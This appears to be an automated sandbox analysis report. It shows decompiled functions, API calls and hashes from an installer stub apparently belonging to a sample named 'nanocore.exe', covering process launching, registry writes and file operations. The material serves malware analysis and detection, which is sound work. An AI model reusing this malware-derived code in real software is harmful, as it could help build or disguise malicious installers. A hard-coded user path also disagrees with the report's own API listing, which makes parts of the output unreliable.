            0x00401c68
            0x00401c6b
            0x00401c93
            0x00401cc7
            0x00401cc7
            0x00401c6d
            0x00401c7b
            0x00401c83
            0x00401c86
            0x00401c86
            0x00401c6b
            0x00401cca
            0x00401ccd
            0x00401cd3
            0x004028d7
            0x004028d7
            0x00402932
            0x0040293e

            APIs
            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
            • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
            • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E00401E9C() {
            				void* _t15;
            				void* _t24;
            				void* _t26;
            				void* _t31;
            
            				_t28 = E00402A9A(_t24);
            				E00404D62(0xffffffeb, _t13);
            				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
            				 *(_t31 + 8) = _t15;
            				if(_t15 == _t24) {
            					 *((intOrPtr*)(_t31 - 4)) = 1;
            				} else {
            					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
            						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
            							E00405CFC(0xf);
            						}
            						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
            						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
            							if( *(_t31 - 0x34) != _t24) {
            								 *((intOrPtr*)(_t31 - 4)) = 1;
            							}
            						} else {
            							E0040591D(_t26,  *(_t31 - 0x34));
            						}
            					}
            					_push( *(_t31 + 8));
            					CloseHandle();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
            				return 0;
            			}

            0x00401ea2
            0x00401ea7
            0x00401eb2
            0x00401eb9
            0x00401ebc
            0x004026da
            0x00401ec2
            0x00401ec5
            0x00401ed6
            0x00401ed1
            0x00401ed1
            0x00401eeb
            0x00401ef4
            0x00401f04
            0x00401f06
            0x00401f06
            0x00401ef6
            0x00401efa
            0x00401efa
            0x00401ef4
            0x00401f0d
            0x00401f10
            0x00401f10
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
              • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
              • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
              • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
            • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
            • GetExitCodeProcess.KERNEL32 ref: 00401EEB
            • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 4003922372-47812868
            • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
            • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
            • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405247(CHAR* _a4, CHAR* _a8) {
            				struct _PROCESS_INFORMATION _v20;
            				signed char _t10;
            				int _t12;
            
            				0x7a1588->cb = 0x44;
            				_t10 = GetFileAttributesA(_a8);
            				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
            					_a8 = 0;
            				}
            				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
            				if(_t12 != 0) {
            					CloseHandle(_v20.hThread);
            					return _v20.hProcess;
            				}
            				return _t12;
            			}

            0x00405250
            0x0040525a
            0x00405265
            0x0040526b
            0x0040526b
            0x00405283
            0x0040528b
            0x00405290
            0x00000000
            0x00405296
            0x0040529a

            APIs
            • GetFileAttributesA.KERNEL32(?), ref: 0040525A
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
            • CloseHandle.KERNEL32(?), ref: 00405290
            Strings
            • Error launching installer, xrefs: 00405247
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: AttributesCloseCreateFileHandleProcess
            • String ID: Error launching installer
            • API String ID: 2000254098-66219284
            • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
            • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
            • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004054CC(CHAR* _a4) {
            				CHAR* _t7;
            
            				_t7 = _a4;
            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
            					lstrcatA(_t7, 0x409010);
            				}
            				return _t7;
            			}

            0x004054cd
            0x004054e4
            0x004054ec
            0x004054ec
            0x004054f4

            APIs
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
            • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-3081826266
            • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
            • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
            • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E00402386(void* __eax, void* __eflags) {
            				void* _t15;
            				char* _t18;
            				int _t19;
            				char _t24;
            				int _t27;
            				intOrPtr _t33;
            				void* _t35;
            
            				_t15 = E00402B61(__eax);
            				_t33 =  *((intOrPtr*)(_t35 - 0x14));
            				 *(_t35 - 0x30) =  *(_t35 - 0x10);
            				 *(_t35 - 0x44) = E00402A9A(2);
            				_t18 = E00402A9A(0x11);
            				 *(_t35 - 4) = 1;
            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
            				if(_t19 == 0) {
            					if(_t33 == 1) {
            						E00402A9A(0x23);
            						_t19 = lstrlenA(0x40a418) + 1;
            					}
            					if(_t33 == 4) {
            						_t24 = E00402A7D(3);
            						 *0x40a418 = _t24;
            						_t19 = _t33;
            					}
            					if(_t33 == 3) {
            						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
            					}
            					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
            						 *(_t35 - 4) = _t27;
            					}
            					_push( *(_t35 + 8));
            					RegCloseKey();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
            				return 0;
            			}

            0x00402387
            0x0040238c
            0x00402396
            0x004023a0
            0x004023a3
            0x004023b5
            0x004023bc
            0x004023c4
            0x004023d2
            0x004023d6
            0x004023e1
            0x004023e1
            0x004023e5
            0x004023e9
            0x004023ef
            0x004023f4
            0x004023f4
            0x004023f8
            0x00402404
            0x00402404
            0x0040241d
            0x0040241f
            0x0040241f
            0x00402422
            0x004024fb
            0x004024fb
            0x00402932
            0x0040293e

            APIs
            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
            • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
            • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
            • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID:
            • API String ID: 1356686001-0
            • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
            • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
            • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E00401F4B(char __ebx, char* __edi, char* __esi) {
            				char* _t21;
            				int _t22;
            				void* _t33;
            
            				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
            				_t21 = E00402A9A(0xffffffee);
            				 *(_t33 - 0x2c) = _t21;
            				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
            				 *__esi = __ebx;
            				 *(_t33 - 8) = _t22;
            				 *__edi = __ebx;
            				 *((intOrPtr*)(_t33 - 4)) = 1;
            				if(_t22 != __ebx) {
            					__eax = GlobalAlloc(0x40, __eax);
            					 *(__ebp - 0x34) = __eax;
            					if(__eax != __ebx) {
            						if(__eax != 0) {
            							__ebp - 0x44 = __ebp + 8;
            							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
            								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
            								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
            								 *((intOrPtr*)(__ebp - 4)) = __ebx;
            							}
            						}
            						_push( *(__ebp - 0x34));
            						GlobalFree();
            					}
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
            				return 0;
            			}

            0x00401f50
            0x00401f53
            0x00401f5b
            0x00401f60
            0x00401f65
            0x00401f69
            0x00401f6c
            0x00401f6e
            0x00401f75
            0x00401f7e
            0x00401f86
            0x00401f89
            0x00401f9e
            0x00401fa4
            0x00401fb7
            0x00401fc0
            0x00401fcc
            0x00401fd1
            0x00401fd1
            0x00401fb7
            0x00401fd4
            0x00401be1
            0x00401be1
            0x00401f89
            0x00402932
            0x0040293e

            APIs
            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
            • String ID:
            • API String ID: 1404258612-0
            • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
            • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
            • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E004021F6() {
            				void* __ebx;
            				char _t33;
            				CHAR* _t35;
            				CHAR* _t38;
            				void* _t40;
            
            				_t35 = E00402A9A(_t33);
            				 *(_t40 + 8) = _t35;
            				_t38 = E00402A9A(0x11);
            				 *(_t40 - 0x64) =  *(_t40 - 8);
            				 *((intOrPtr*)(_t40 - 0x60)) = 2;
            				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
            				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
            				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
            				lstrcatA(0x40a418, _t38);
            				 *(_t40 - 0x5c) =  *(_t40 + 8);
            				 *(_t40 - 0x58) = _t38;
            				 *(_t40 - 0x4a) = 0x40a418;
            				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
            				E00404D62(_t33, 0x40a418);
            				if(SHFileOperationA(_t40 - 0x64) != 0) {
            					E00404D62(0xfffffff9, _t33);
            					 *((intOrPtr*)(_t40 - 4)) = 1;
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
            				return 0;
            			}

            0x004021fc
            0x00402200
            0x00402208
            0x0040220e
            0x00402211
            0x0040221e
            0x0040222f
            0x00402233
            0x0040223a
            0x00402243
            0x0040224b
            0x0040224e
            0x00402251
            0x00402255
            0x00402266
            0x0040226f
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • lstrlenA.KERNEL32 ref: 00402218
            • lstrlenA.KERNEL32(00000000), ref: 00402222
            • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
            • String ID:
            • API String ID: 3674637002-0
            • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
            • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
            • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040555F(CHAR* _a4) {
            				CHAR* _t3;
            				char* _t5;
            				CHAR* _t7;
            				CHAR* _t8;
            				void* _t10;
            
            				_t8 = _a4;
            				_t7 = CharNextA(_t8);
            				_t3 = CharNextA(_t7);
            				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
            					if( *_t8 != 0x5c5c) {
            						L8:
            						return 0;
            					}
            					_t10 = 2;
            					while(1) {
            						_t10 = _t10 - 1;
            						_t5 = E004054F7(_t3, 0x5c);
            						if( *_t5 == 0) {
            							goto L8;
            						}
            						_t3 = _t5 + 1;
            						if(_t10 != 0) {
            							continue;
            						}
            						return _t3;
            					}
            					goto L8;
            				} else {
            					return CharNextA(_t3);
            				}
            			}

            0x00405568
            0x0040556f
            0x00405572
            0x00405577
            0x0040558a
            0x004055a4
            0x00000000
            0x004055a4
            0x0040558e
            0x0040558f
            0x00405592
            0x00405593
            0x0040559b
            0x00000000
            0x00000000
            0x0040559d
            0x004055a0
            0x00000000
            0x00000000
            0x00000000
            0x004055a0
            0x00000000
            0x00405580
            0x00000000
            0x00405581

            APIs
            • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040556D
            • CharNextA.USER32(00000000), ref: 00405572
            • CharNextA.USER32(00000000), ref: 00405581
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharNext
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 3213498283-3081826266
            • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
            • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
            • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			// NSIS CreateFont instruction (EW_CREATEFONT): fills a static LOGFONT at 0x4093d8
            			// and hands the resulting HFONT back to the script as a decimal string.
            			E00401D8E() {
            				void* __esi;
            				int _t6;
            				signed char _t11;
            				struct HFONT__* _t14;
            				void* _t18;
            				void* _t24;
            				void* _t26;
            				void* _t28;
            
            				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a); // 0x5a = LOGPIXELSY
            				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48)); // point size to a negative pixel height (72 points per inch)
            				 *0x4093e8 = E00402A7D(3); // lfWeight
            				_t11 =  *((intOrPtr*)(_t28 - 0x14));
            				 *0x4093ef = 1; // lfCharSet = DEFAULT_CHARSET
            				 *0x4093ec = _t11 & 0x00000001; // lfItalic
            				 *0x4093ed = _t11 & 0x00000002; // lfUnderline
            				 *0x4093ee = _t11 & 0x00000004; // lfStrikeOut
            				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20))); // lfFaceName from the string table
            				_t14 = CreateFontIndirectA(0x4093d8);
            				_push(_t14);
            				_push(_t26);
            				E0040591D(); // myitoa(): store the handle as text in the target $var
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4)); // exec_error counter
            				return 0;
            			}
            
            APIs
            • GetDC.USER32(?), ref: 00401D95
            • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
            • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CapsCreateDeviceFontIndirect
            • String ID:
            • API String ID: 3272661963-0
            • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
            • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 74%
